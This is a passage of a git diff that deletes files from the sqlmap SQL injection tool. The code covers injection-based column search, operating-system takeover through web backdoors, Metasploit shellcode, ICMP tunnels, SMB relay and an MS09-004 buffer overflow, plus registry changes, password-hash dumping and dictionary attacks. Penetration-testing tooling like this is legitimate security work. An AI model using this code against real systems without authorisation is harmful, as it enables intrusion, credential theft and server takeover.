conf.tbl = tbl - conf.col = column - - self.getColumns(onlyColNames=True, colTuple=(colConsider, colCondParam), bruteForce=False) - - if db in kb.data.cachedColumns and tbl in kb.data.cachedColumns[db]: - if db not in dbs: - dbs[db] = {} - - if tbl not in dbs[db]: - dbs[db][tbl] = {} - - dbs[db][tbl].update(kb.data.cachedColumns[db][tbl]) - - if db in foundCols[column]: - foundCols[column][db].append(tbl) - else: - foundCols[column][db] = [tbl] - - kb.data.cachedColumns = {} - - if not values and isInferenceAvailable() and not conf.direct: - if not conf.db: - infoMsg = "fetching number of databases with tables containing column" - if colConsider == "1": - infoMsg += "s LIKE" - infoMsg += " '%s'" % unsafeSQLIdentificatorNaming(column) - logger.info("%s%s%s" % (infoMsg, infoMsgTbl, infoMsgDb)) - - query = rootQuery.blind.count - query = query % (colQuery + whereDbsQuery + whereTblsQuery) - count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) - - if not isNumPosStrValue(count): - warnMsg = "no databases have tables containing column" - if colConsider == "1": - warnMsg += "s LIKE" - warnMsg += " '%s'" % unsafeSQLIdentificatorNaming(column) - logger.warn("%s%s" % (warnMsg, infoMsgTbl)) - - continue - - indexRange = getLimitRange(count) - - for index in indexRange: - query = rootQuery.blind.query - query = query % (colQuery + whereDbsQuery + whereTblsQuery) - query = agent.limitQuery(index, query) - - db = unArrayizeValue(inject.getValue(query, union=False, error=False)) - db = safeSQLIdentificatorNaming(db) - - if db not in dbs: - dbs[db] = {} - - if db not in foundCols[column]: - foundCols[column][db] = [] - else: - for db in conf.db.split(",") if conf.db else (self.getCurrentDb(),): - db = safeSQLIdentificatorNaming(db) - if db not in foundCols[column]: - foundCols[column][db] = [] - - origDb = conf.db - origTbl = conf.tbl - - for column, dbData in foundCols.items(): - colQuery = "%s%s" % (colCond, 
colCondParam) - colQuery = colQuery % unsafeSQLIdentificatorNaming(column) - - for db in dbData: - conf.db = origDb - conf.tbl = origTbl - - infoMsg = "fetching number of tables containing column" - if colConsider == "1": - infoMsg += "s LIKE" - infoMsg += " '%s' in database '%s'" % (unsafeSQLIdentificatorNaming(column), unsafeSQLIdentificatorNaming(db)) - logger.info(infoMsg) - - query = rootQuery.blind.count2 - query = query % unsafeSQLIdentificatorNaming(db) - query += " AND %s" % colQuery - query += whereTblsQuery - - count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) - - if not isNumPosStrValue(count): - warnMsg = "no tables contain column" - if colConsider == "1": - warnMsg += "s LIKE" - warnMsg += " '%s' " % unsafeSQLIdentificatorNaming(column) - warnMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(db) - logger.warn(warnMsg) - - continue - - indexRange = getLimitRange(count) - - for index in indexRange: - query = rootQuery.blind.query2 - - if query.endswith("'%s')"): - query = query[:-1] + " AND %s)" % (colQuery + whereTblsQuery) - else: - query += " AND %s" % (colQuery + whereTblsQuery) - - query = safeStringFormat(query, unsafeSQLIdentificatorNaming(db)) - query = agent.limitQuery(index, query) - - tbl = unArrayizeValue(inject.getValue(query, union=False, error=False)) - kb.hintValue = tbl - - tbl = safeSQLIdentificatorNaming(tbl, True) - - conf.db = db - conf.tbl = tbl - conf.col = column - - self.getColumns(onlyColNames=True, colTuple=(colConsider, colCondParam), bruteForce=False) - - if db in kb.data.cachedColumns and tbl in kb.data.cachedColumns[db]: - if db not in dbs: - dbs[db] = {} - - if tbl not in dbs[db]: - dbs[db][tbl] = {} - - dbs[db][tbl].update(kb.data.cachedColumns[db][tbl]) - - kb.data.cachedColumns = {} - - if db in foundCols[column]: - foundCols[column][db].append(tbl) - else: - foundCols[column][db] = [tbl] - - if dbs: - conf.dumper.dbColumns(foundCols, colConsider, 
dbs) - self.dumpFoundColumn(dbs, foundCols, colConsider) - else: - warnMsg = "no databases have tables containing any of the " - warnMsg += "provided columns" - logger.warn(warnMsg) - - def search(self): - if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): - for item in ('db', 'tbl', 'col'): - if getattr(conf, item, None): - setattr(conf, item, getattr(conf, item).upper()) - - if conf.col: - self.searchColumn() - elif conf.tbl: - self.searchTable() - elif conf.db: - self.searchDb() - else: - errMsg = "missing parameter, provide -D, -T or -C along " - errMsg += "with --search" - raise SqlmapMissingMandatoryOptionException(errMsg) diff --git a/plugins/generic/syntax.py b/plugins/generic/syntax.py deleted file mode 100644 index 390ce92f..00000000 --- a/plugins/generic/syntax.py +++ /dev/null @@ -1,38 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import re - -from lib.core.exception import SqlmapUndefinedMethod - -class Syntax: - """ - This class defines generic syntax functionalities for plugins. 
- """ - - def __init__(self): - pass - - @staticmethod - def _escape(expression, quote=True, escaper=None): - retVal = expression - - if quote: - for item in re.findall(r"'[^']*'+", expression, re.S): - _ = item[1:-1] - if _: - retVal = retVal.replace(item, escaper(_)) - else: - retVal = escaper(expression) - - return retVal - - @staticmethod - def escape(expression, quote=True): - errMsg = "'escape' method must be defined " - errMsg += "inside the specific DBMS plugin" - raise SqlmapUndefinedMethod(errMsg) diff --git a/plugins/generic/takeover.py b/plugins/generic/takeover.py deleted file mode 100644 index 1e35307a..00000000 --- a/plugins/generic/takeover.py +++ /dev/null @@ -1,473 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import os - -from lib.core.common import Backend -from lib.core.common import isStackingAvailable -from lib.core.common import readInput -from lib.core.common import runningAsAdmin -from lib.core.data import conf -from lib.core.data import logger -from lib.core.enums import DBMS -from lib.core.enums import OS -from lib.core.exception import SqlmapFilePathException -from lib.core.exception import SqlmapMissingDependence -from lib.core.exception import SqlmapMissingMandatoryOptionException -from lib.core.exception import SqlmapMissingPrivileges -from lib.core.exception import SqlmapNotVulnerableException -from lib.core.exception import SqlmapUndefinedMethod -from lib.core.exception import SqlmapUnsupportedDBMSException -from lib.takeover.abstraction import Abstraction -from lib.takeover.icmpsh import ICMPsh -from lib.takeover.metasploit import Metasploit -from lib.takeover.registry import Registry - -from plugins.generic.misc import Miscellaneous - -class Takeover(Abstraction, Metasploit, ICMPsh, Registry, Miscellaneous): - """ - This class defines generic OS takeover functionalities for plugins. 
- """ - - def __init__(self): - self.cmdTblName = "sqlmapoutput" - self.tblField = "data" - - Abstraction.__init__(self) - - def osCmd(self): - if isStackingAvailable() or conf.direct: - web = False - elif not isStackingAvailable() and Backend.isDbms(DBMS.MYSQL): - infoMsg = "going to use a web backdoor for command execution" - logger.info(infoMsg) - - web = True - else: - errMsg = "unable to execute operating system commands via " - errMsg += "the back-end DBMS" - raise SqlmapNotVulnerableException(errMsg) - - self.getRemoteTempPath() - self.initEnv(web=web) - - if not web or (web and self.webBackdoorUrl is not None): - self.runCmd(conf.osCmd) - - if not conf.osShell and not conf.osPwn and not conf.cleanup: - self.cleanup(web=web) - - def osShell(self): - if isStackingAvailable() or conf.direct: - web = False - elif not isStackingAvailable() and Backend.isDbms(DBMS.MYSQL): - infoMsg = "going to use a web backdoor for command prompt" - logger.info(infoMsg) - - web = True - else: - errMsg = "unable to prompt for an interactive operating " - errMsg += "system shell via the back-end DBMS because " - errMsg += "stacked queries SQL injection is not supported" - raise SqlmapNotVulnerableException(errMsg) - - self.getRemoteTempPath() - self.initEnv(web=web) - - if not web or (web and self.webBackdoorUrl is not None): - self.shell() - - if not conf.osPwn and not conf.cleanup: - self.cleanup(web=web) - - def osPwn(self): - goUdf = False - fallbackToWeb = False - setupSuccess = False - - self.checkDbmsOs() - - if Backend.isOs(OS.WINDOWS): - msg = "how do you want to establish the tunnel?" 
- msg += "\n[1] TCP: Metasploit Framework (default)" - msg += "\n[2] ICMP: icmpsh - ICMP tunneling" - valids = (1, 2) - - while True: - tunnel = readInput(msg, default=1) - - if isinstance(tunnel, basestring) and tunnel.isdigit() and int(tunnel) in valids: - tunnel = int(tunnel) - break - - elif isinstance(tunnel, int) and tunnel in valids: - break - - else: - warnMsg = "invalid value, valid values are 1 and 2" - logger.warn(warnMsg) - else: - tunnel = 1 - - debugMsg = "the tunnel can be established only via TCP when " - debugMsg += "the back-end DBMS is not Windows" - logger.debug(debugMsg) - - if tunnel == 2: - isAdmin = runningAsAdmin() - - if not isAdmin: - errMsg = "you need to run sqlmap as an administrator " - errMsg += "if you want to establish an out-of-band ICMP " - errMsg += "tunnel because icmpsh uses raw sockets to " - errMsg += "sniff and craft ICMP packets" - raise SqlmapMissingPrivileges(errMsg) - - try: - from impacket import ImpactDecoder - from impacket import ImpactPacket - except ImportError: - errMsg = "sqlmap requires 'python-impacket' third-party library " - errMsg += "in order to run icmpsh master. You can get it at " - errMsg += "http://code.google.com/p/impacket/downloads/list" - raise SqlmapMissingDependence(errMsg) - - sysIgnoreIcmp = "/proc/sys/net/ipv4/icmp_echo_ignore_all" - - if os.path.exists(sysIgnoreIcmp): - fp = open(sysIgnoreIcmp, "wb") - fp.write("1") - fp.close() - else: - errMsg = "you need to disable ICMP replies by your machine " - errMsg += "system-wide. 
For example run on Linux/Unix:\n" - errMsg += "# sysctl -w net.ipv4.icmp_echo_ignore_all=1\n" - errMsg += "If you miss doing that, you will receive " - errMsg += "information from the database server and it " - errMsg += "is unlikely to receive commands sent from you" - logger.error(errMsg) - - if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL): - self.sysUdfs.pop("sys_bineval") - - self.getRemoteTempPath() - - if isStackingAvailable() or conf.direct: - web = False - - self.initEnv(web=web) - - if tunnel == 1: - if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL): - msg = "how do you want to execute the Metasploit shellcode " - msg += "on the back-end database underlying operating system?" - msg += "\n[1] Via UDF 'sys_bineval' (in-memory way, anti-forensics, default)" - msg += "\n[2] Via shellcodeexec (file system way, preferred on 64-bit systems)" - - while True: - choice = readInput(msg, default=1) - - if isinstance(choice, basestring) and choice.isdigit() and int(choice) in (1, 2): - choice = int(choice) - break - - elif isinstance(choice, int) and choice in (1, 2): - break - - else: - warnMsg = "invalid value, valid values are 1 and 2" - logger.warn(warnMsg) - - if choice == 1: - goUdf = True - - if goUdf: - exitfunc = "thread" - setupSuccess = True - else: - exitfunc = "process" - - self.createMsfShellcode(exitfunc=exitfunc, format="raw", extra="BufferRegister=EAX", encode="x86/alpha_mixed") - - if not goUdf: - setupSuccess = self.uploadShellcodeexec(web=web) - - if setupSuccess is not True: - if Backend.isDbms(DBMS.MYSQL): - fallbackToWeb = True - else: - msg = "unable to mount the operating system takeover" - raise SqlmapFilePathException(msg) - - if Backend.isOs(OS.WINDOWS) and Backend.isDbms(DBMS.MYSQL) and conf.privEsc: - debugMsg = "by default MySQL on Windows runs as SYSTEM " - debugMsg += "user, no need to privilege escalate" - logger.debug(debugMsg) - - elif tunnel == 2: - setupSuccess = self.uploadIcmpshSlave(web=web) - - if 
setupSuccess is not True: - if Backend.isDbms(DBMS.MYSQL): - fallbackToWeb = True - else: - msg = "unable to mount the operating system takeover" - raise SqlmapFilePathException(msg) - - if not setupSuccess and Backend.isDbms(DBMS.MYSQL) and not conf.direct and (not isStackingAvailable() or fallbackToWeb): - web = True - - if fallbackToWeb: - infoMsg = "falling back to web backdoor to establish the tunnel" - else: - infoMsg = "going to use a web backdoor to establish the tunnel" - logger.info(infoMsg) - - self.initEnv(web=web, forceInit=fallbackToWeb) - - if self.webBackdoorUrl: - if not Backend.isOs(OS.WINDOWS) and conf.privEsc: - # Unset --priv-esc if the back-end DBMS underlying operating - # system is not Windows - conf.privEsc = False - - warnMsg = "sqlmap does not implement any operating system " - warnMsg += "user privilege escalation technique when the " - warnMsg += "back-end DBMS underlying system is not Windows" - logger.warn(warnMsg) - - if tunnel == 1: - self.createMsfShellcode(exitfunc="process", format="raw", extra="BufferRegister=EAX", encode="x86/alpha_mixed") - setupSuccess = self.uploadShellcodeexec(web=web) - - if setupSuccess is not True: - msg = "unable to mount the operating system takeover" - raise SqlmapFilePathException(msg) - - elif tunnel == 2: - setupSuccess = self.uploadIcmpshSlave(web=web) - - if setupSuccess is not True: - msg = "unable to mount the operating system takeover" - raise SqlmapFilePathException(msg) - - if setupSuccess: - if tunnel == 1: - self.pwn(goUdf) - elif tunnel == 2: - self.icmpPwn() - else: - errMsg = "unable to prompt for an out-of-band session" - raise SqlmapNotVulnerableException(errMsg) - - if not conf.cleanup: - self.cleanup(web=web) - - def osSmb(self): - self.checkDbmsOs() - - if not Backend.isOs(OS.WINDOWS): - errMsg = "the back-end DBMS underlying operating system is " - errMsg += "not Windows: it is not possible to perform the SMB " - errMsg += "relay attack" - raise 
SqlmapUnsupportedDBMSException(errMsg) - - if not isStackingAvailable() and not conf.direct: - if Backend.getIdentifiedDbms() in (DBMS.PGSQL, DBMS.MSSQL): - errMsg = "on this back-end DBMS it is only possible to " - errMsg += "perform the SMB relay attack if stacked " - errMsg += "queries are supported" - raise SqlmapUnsupportedDBMSException(errMsg) - - elif Backend.isDbms(DBMS.MYSQL): - debugMsg = "since stacked queries are not supported, " - debugMsg += "sqlmap is going to perform the SMB relay " - debugMsg += "attack via inference blind SQL injection" - logger.debug(debugMsg) - - printWarn = True - warnMsg = "it is unlikely that this attack will be successful " - - if Backend.isDbms(DBMS.MYSQL): - warnMsg += "because by default MySQL on Windows runs as " - warnMsg += "Local System which is not a real user, it does " - warnMsg += "not send the NTLM session hash when connecting to " - warnMsg += "a SMB service" - - elif Backend.isDbms(DBMS.PGSQL): - warnMsg += "because by default PostgreSQL on Windows runs " - warnMsg += "as postgres user which is a real user of the " - warnMsg += "system, but not within the Administrators group" - - elif Backend.isDbms(DBMS.MSSQL) and Backend.isVersionWithin(("2005", "2008")): - warnMsg += "because often Microsoft SQL Server %s " % Backend.getVersion() - warnMsg += "runs as Network Service which is not a real user, " - warnMsg += "it does not send the NTLM session hash when " - warnMsg += "connecting to a SMB service" - - else: - printWarn = False - - if printWarn: - logger.warn(warnMsg) - - self.smb() - - def osBof(self): - if not isStackingAvailable() and not conf.direct: - return - - if not Backend.isDbms(DBMS.MSSQL) or not Backend.isVersionWithin(("2000", "2005")): - errMsg = "the back-end DBMS must be Microsoft SQL Server " - errMsg += "2000 or 2005 to be able to exploit the heap-based " - errMsg += "buffer overflow in the 'sp_replwritetovarbin' " - errMsg += "stored procedure (MS09-004)" - raise 
SqlmapUnsupportedDBMSException(errMsg) - - infoMsg = "going to exploit the Microsoft SQL Server %s " % Backend.getVersion() - infoMsg += "'sp_replwritetovarbin' stored procedure heap-based " - infoMsg += "buffer overflow (MS09-004)" - logger.info(infoMsg) - - msg = "this technique is likely to DoS the DBMS process, are you " - msg += "sure that you want to carry with the exploit? [y/N] " - choice = readInput(msg, default="N") - - dos = choice and choice[0].lower() == "y" - - if dos: - self.initEnv(mandatory=False, detailed=True) - self.getRemoteTempPath() - self.createMsfShellcode(exitfunc="seh", format="raw", extra="-b 27", encode=True) - self.bof() - - def uncPathRequest(self): - errMsg = "'uncPathRequest' method must be defined " - errMsg += "into the specific DBMS plugin" - raise SqlmapUndefinedMethod(errMsg) - - def _regInit(self): - if not isStackingAvailable() and not conf.direct: - return - - self.checkDbmsOs() - - if not Backend.isOs(OS.WINDOWS): - errMsg = "the back-end DBMS underlying operating system is " - errMsg += "not Windows" - raise SqlmapUnsupportedDBMSException(errMsg) - - self.initEnv() - self.getRemoteTempPath() - - def regRead(self): - self._regInit() - - if not conf.regKey: - default = "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion" - msg = "which registry key do you want to read? [%s] " % default - regKey = readInput(msg, default=default) - else: - regKey = conf.regKey - - if not conf.regVal: - default = "ProductName" - msg = "which registry key value do you want to read? [%s] " % default - regVal = readInput(msg, default=default) - else: - regVal = conf.regVal - - infoMsg = "reading Windows registry path '%s\%s' " % (regKey, regVal) - logger.info(infoMsg) - - return self.readRegKey(regKey, regVal, True) - - def regAdd(self): - self._regInit() - - errMsg = "missing mandatory option" - - if not conf.regKey: - msg = "which registry key do you want to write? 
" - regKey = readInput(msg) - - if not regKey: - raise SqlmapMissingMandatoryOptionException(errMsg) - else: - regKey = conf.regKey - - if not conf.regVal: - msg = "which registry key value do you want to write? " - regVal = readInput(msg) - - if not regVal: - raise SqlmapMissingMandatoryOptionException(errMsg) - else: - regVal = conf.regVal - - if not conf.regData: - msg = "which registry key value data do you want to write? " - regData = readInput(msg) - - if not regData: - raise SqlmapMissingMandatoryOptionException(errMsg) - else: - regData = conf.regData - - if not conf.regType: - default = "REG_SZ" - msg = "which registry key value data-type is it? " - msg += "[%s] " % default - regType = readInput(msg, default=default) - else: - regType = conf.regType - - infoMsg = "adding Windows registry path '%s\%s' " % (regKey, regVal) - infoMsg += "with data '%s'. " % regData - infoMsg += "This will work only if the user running the database " - infoMsg += "process has privileges to modify the Windows registry." - logger.info(infoMsg) - - self.addRegKey(regKey, regVal, regType, regData) - - def regDel(self): - self._regInit() - - errMsg = "missing mandatory option" - - if not conf.regKey: - msg = "which registry key do you want to delete? " - regKey = readInput(msg) - - if not regKey: - raise SqlmapMissingMandatoryOptionException(errMsg) - else: - regKey = conf.regKey - - if not conf.regVal: - msg = "which registry key value do you want to delete? " - regVal = readInput(msg) - - if not regVal: - raise SqlmapMissingMandatoryOptionException(errMsg) - else: - regVal = conf.regVal - - message = "are you sure that you want to delete the Windows " - message += "registry path '%s\%s? [y/N] " % (regKey, regVal) - output = readInput(message, default="N") - - if output and output[0] not in ("Y", "y"): - return - - infoMsg = "deleting Windows registry path '%s\%s'. 
" % (regKey, regVal) - infoMsg += "This will work only if the user running the database " - infoMsg += "process has privileges to modify the Windows registry." - logger.info(infoMsg) - - self.delRegKey(regKey, regVal) diff --git a/plugins/generic/users.py b/plugins/generic/users.py deleted file mode 100644 index bb2db4cd..00000000 --- a/plugins/generic/users.py +++ /dev/null @@ -1,614 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import re - -from lib.core.agent import agent -from lib.core.common import arrayizeValue -from lib.core.common import Backend -from lib.core.common import filterPairValues -from lib.core.common import getLimitRange -from lib.core.common import getUnicode -from lib.core.common import isAdminFromPrivileges -from lib.core.common import isInferenceAvailable -from lib.core.common import isNoneValue -from lib.core.common import isNumPosStrValue -from lib.core.common import isTechniqueAvailable -from lib.core.common import parsePasswordHash -from lib.core.common import randomStr -from lib.core.common import readInput -from lib.core.common import unArrayizeValue -from lib.core.convert import hexencode -from lib.core.data import conf -from lib.core.data import kb -from lib.core.data import logger -from lib.core.data import queries -from lib.core.dicts import MYSQL_PRIVS -from lib.core.dicts import PGSQL_PRIVS -from lib.core.dicts import FIREBIRD_PRIVS -from lib.core.dicts import DB2_PRIVS -from lib.core.enums import CHARSET_TYPE -from lib.core.enums import DBMS -from lib.core.enums import EXPECTED -from lib.core.enums import PAYLOAD -from lib.core.exception import SqlmapNoneDataException -from lib.core.exception import SqlmapUserQuitException -from lib.core.threads import getCurrentThreadData -from lib.request import inject -from lib.utils.hash import attackCachedUsersPasswords -from lib.utils.hash import storeHashesToFile -from 
lib.utils.pivotdumptable import pivotDumpTable - -class Users: - """ - This class defines users' enumeration functionalities for plugins. - """ - - def __init__(self): - kb.data.currentUser = "" - kb.data.isDba = None - kb.data.cachedUsers = [] - kb.data.cachedUsersPasswords = {} - kb.data.cachedUsersPrivileges = {} - kb.data.cachedUsersRoles = {} - - def getCurrentUser(self): - infoMsg = "fetching current user" - logger.info(infoMsg) - - query = queries[Backend.getIdentifiedDbms()].current_user.query - - if not kb.data.currentUser: - kb.data.currentUser = unArrayizeValue(inject.getValue(query)) - - return kb.data.currentUser - - def isDba(self, user=None): - infoMsg = "testing if current user is DBA" - logger.info(infoMsg) - - if Backend.isDbms(DBMS.MYSQL): - self.getCurrentUser() - query = queries[Backend.getIdentifiedDbms()].is_dba.query % (kb.data.currentUser.split("@")[0] if kb.data.currentUser else None) - elif Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE) and user is not None: - query = queries[Backend.getIdentifiedDbms()].is_dba.query2 % user - else: - query = queries[Backend.getIdentifiedDbms()].is_dba.query - - query = agent.forgeCaseStatement(query) - kb.data.isDba = inject.checkBooleanExpression(query) or False - - return kb.data.isDba - - def getUsers(self): - infoMsg = "fetching database users" - logger.info(infoMsg) - - rootQuery = queries[Backend.getIdentifiedDbms()].users - - condition = (Backend.isDbms(DBMS.MSSQL) and Backend.isVersionWithin(("2005", "2008"))) - condition |= (Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema) - - if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct: - if condition: - query = rootQuery.inband.query2 - else: - query = rootQuery.inband.query - values = inject.getValue(query, blind=False, time=False) - - if not isNoneValue(values): - kb.data.cachedUsers = [] - for value in arrayizeValue(values): - value = 
unArrayizeValue(value) - if not isNoneValue(value): - kb.data.cachedUsers.append(value) - - if not kb.data.cachedUsers and isInferenceAvailable() and not conf.direct: - infoMsg = "fetching number of database users" - logger.info(infoMsg) - - if condition: - query = rootQuery.blind.count2 - else: - query = rootQuery.blind.count - - count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) - - if count == 0: - return kb.data.cachedUsers - elif not isNumPosStrValue(count): - errMsg = "unable to retrieve the number of database users" - raise SqlmapNoneDataException(errMsg) - - plusOne = Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2) - indexRange = getLimitRange(count, plusOne=plusOne) - - for index in indexRange: - if Backend.getIdentifiedDbms() in (DBMS.SYBASE, DBMS.MAXDB): - query = rootQuery.blind.query % (kb.data.cachedUsers[-1] if kb.data.cachedUsers else " ") - elif condition: - query = rootQuery.blind.query2 % index - else: - query = rootQuery.blind.query % index - user = unArrayizeValue(inject.getValue(query, union=False, error=False)) - - if user: - kb.data.cachedUsers.append(user) - - if not kb.data.cachedUsers: - errMsg = "unable to retrieve the database users" - logger.error(errMsg) - - return kb.data.cachedUsers - - def getPasswordHashes(self): - infoMsg = "fetching database users password hashes" - - rootQuery = queries[Backend.getIdentifiedDbms()].passwords - - if conf.user == "CU": - infoMsg += " for current user" - conf.user = self.getCurrentUser() - - logger.info(infoMsg) - - if conf.user and Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): - conf.user = conf.user.upper() - - if conf.user: - users = conf.user.split(",") - - if Backend.isDbms(DBMS.MYSQL): - for user in users: - parsedUser = re.search("[\047]*(.*?)[\047]*\@", user) - - if parsedUser: - users[users.index(user)] = parsedUser.groups()[0] - else: - users = [] - - users = filter(None, users) - - if 
any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct: - if Backend.isDbms(DBMS.MSSQL) and Backend.isVersionWithin(("2005", "2008")): - query = rootQuery.inband.query2 - else: - query = rootQuery.inband.query - - condition = rootQuery.inband.condition - - if conf.user: - query += " WHERE " - query += " OR ".join("%s = '%s'" % (condition, user) for user in sorted(users)) - - if Backend.isDbms(DBMS.SYBASE): - randStr = randomStr() - getCurrentThreadData().disableStdOut = True - - retVal = pivotDumpTable("(%s) AS %s" % (query, randStr), ['%s.name' % randStr, '%s.password' % randStr], blind=False) - - if retVal: - for user, password in filterPairValues(zip(retVal[0]["%s.name" % randStr], retVal[0]["%s.password" % randStr])): - if user not in kb.data.cachedUsersPasswords: - kb.data.cachedUsersPasswords[user] = [password] - else: - kb.data.cachedUsersPasswords[user].append(password) - - getCurrentThreadData().disableStdOut = False - else: - values = inject.getValue(query, blind=False, time=False) - - for user, password in filterPairValues(values): - if not user or user == " ": - continue - - password = parsePasswordHash(password) - - if user not in kb.data.cachedUsersPasswords: - kb.data.cachedUsersPasswords[user] = [password] - else: - kb.data.cachedUsersPasswords[user].append(password) - - if not kb.data.cachedUsersPasswords and isInferenceAvailable() and not conf.direct: - if not len(users): - users = self.getUsers() - - if Backend.isDbms(DBMS.MYSQL): - for user in users: - parsedUser = re.search("[\047]*(.*?)[\047]*\@", user) - - if parsedUser: - users[users.index(user)] = parsedUser.groups()[0] - - if Backend.isDbms(DBMS.SYBASE): - getCurrentThreadData().disableStdOut = True - - randStr = randomStr() - query = rootQuery.inband.query - - retVal = pivotDumpTable("(%s) AS %s" % (query, randStr), ['%s.name' % randStr, '%s.password' % randStr], blind=True) - - if retVal: - for user, password in 
filterPairValues(zip(retVal[0]["%s.name" % randStr], retVal[0]["%s.password" % randStr])): - password = "0x%s" % hexencode(password).upper() - - if user not in kb.data.cachedUsersPasswords: - kb.data.cachedUsersPasswords[user] = [password] - else: - kb.data.cachedUsersPasswords[user].append(password) - - getCurrentThreadData().disableStdOut = False - else: - retrievedUsers = set() - - for user in users: - user = unArrayizeValue(user) - - if user in retrievedUsers: - continue - - infoMsg = "fetching number of password hashes " - infoMsg += "for user '%s'" % user - logger.info(infoMsg) - - if Backend.isDbms(DBMS.MSSQL) and Backend.isVersionWithin(("2005", "2008")): - query = rootQuery.blind.count2 % user - else: - query = rootQuery.blind.count % user - - count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) - - if not isNumPosStrValue(count): - warnMsg = "unable to retrieve the number of password " - warnMsg += "hashes for user '%s'" % user - logger.warn(warnMsg) - continue - - infoMsg = "fetching password hashes for user '%s'" % user - logger.info(infoMsg) - - passwords = [] - - plusOne = Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2) - indexRange = getLimitRange(count, plusOne=plusOne) - - for index in indexRange: - if Backend.isDbms(DBMS.MSSQL): - if Backend.isVersionWithin(("2005", "2008")): - query = rootQuery.blind.query2 % (user, index, user) - else: - query = rootQuery.blind.query % (user, index, user) - else: - query = rootQuery.blind.query % (user, index) - - password = unArrayizeValue(inject.getValue(query, union=False, error=False)) - password = parsePasswordHash(password) - passwords.append(password) - - if passwords: - kb.data.cachedUsersPasswords[user] = passwords - else: - warnMsg = "unable to retrieve the password " - warnMsg += "hashes for user '%s'" % user - logger.warn(warnMsg) - - retrievedUsers.add(user) - - if not kb.data.cachedUsersPasswords: - errMsg = "unable to retrieve the 
password hashes for the " - errMsg += "database users (probably because the session " - errMsg += "user has no read privileges over the relevant " - errMsg += "system database table)" - logger.error(errMsg) - else: - for user in kb.data.cachedUsersPasswords: - kb.data.cachedUsersPasswords[user] = list(set(kb.data.cachedUsersPasswords[user])) - - storeHashesToFile(kb.data.cachedUsersPasswords) - - message = "do you want to perform a dictionary-based attack " - message += "against retrieved password hashes? [Y/n/q]" - test = readInput(message, default="Y") - - if test[0] in ("n", "N"): - pass - elif test[0] in ("q", "Q"): - raise SqlmapUserQuitException - else: - attackCachedUsersPasswords() - - return kb.data.cachedUsersPasswords - - def getPrivileges(self, query2=False): - infoMsg = "fetching database users privileges" - - rootQuery = queries[Backend.getIdentifiedDbms()].privileges - - if conf.user == "CU": - infoMsg += " for current user" - conf.user = self.getCurrentUser() - - logger.info(infoMsg) - - if conf.user and Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): - conf.user = conf.user.upper() - - if conf.user: - users = conf.user.split(",") - - if Backend.isDbms(DBMS.MYSQL): - for user in users: - parsedUser = re.search("[\047]*(.*?)[\047]*\@", user) - - if parsedUser: - users[users.index(user)] = parsedUser.groups()[0] - else: - users = [] - - users = filter(None, users) - - # Set containing the list of DBMS administrators - areAdmins = set() - - if not kb.data.cachedUsersPrivileges and any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct: - if Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema: - query = rootQuery.inband.query2 - condition = rootQuery.inband.condition2 - elif Backend.isDbms(DBMS.ORACLE) and query2: - query = rootQuery.inband.query2 - condition = rootQuery.inband.condition2 - else: - query = rootQuery.inband.query - condition = 
rootQuery.inband.condition - - if conf.user: - query += " WHERE " - - if Backend.isDbms(DBMS.MYSQL) and kb.data.has_information_schema: - query += " OR ".join("%s LIKE '%%%s%%'" % (condition, user) for user in sorted(users)) - else: - query += " OR ".join("%s = '%s'" % (condition, user) for user in sorted(users)) - - values = inject.getValue(query, blind=False, time=False) - - if not values and Backend.isDbms(DBMS.ORACLE) and not query2: - infoMsg = "trying with table USER_SYS_PRIVS" - logger.info(infoMsg) - - return self.getPrivileges(query2=True) - - if not isNoneValue(values): - for value in values: - user = None - privileges = set() - - for count in xrange(0, len(value)): - # The first column is always the username - if count == 0: - user = value[count] - - # The other columns are the privileges - else: - privilege = value[count] - - if privilege is None: - continue - - # In PostgreSQL we get 1 if the privilege is - # True, 0 otherwise - if Backend.isDbms(DBMS.PGSQL) and getUnicode(privilege).isdigit(): - if int(privilege) == 1: - privileges.add(PGSQL_PRIVS[count]) - - # In MySQL >= 5.0 and Oracle we get the list - # of privileges as string - elif Backend.isDbms(DBMS.ORACLE) or (Backend.isDbms(DBMS.MYSQL) and kb.data.has_information_schema): - privileges.add(privilege) - - # In MySQL < 5.0 we get Y if the privilege is - # True, N otherwise - elif Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema: - if privilege.upper() == "Y": - privileges.add(MYSQL_PRIVS[count]) - - # In Firebird we get one letter for each privilege - elif 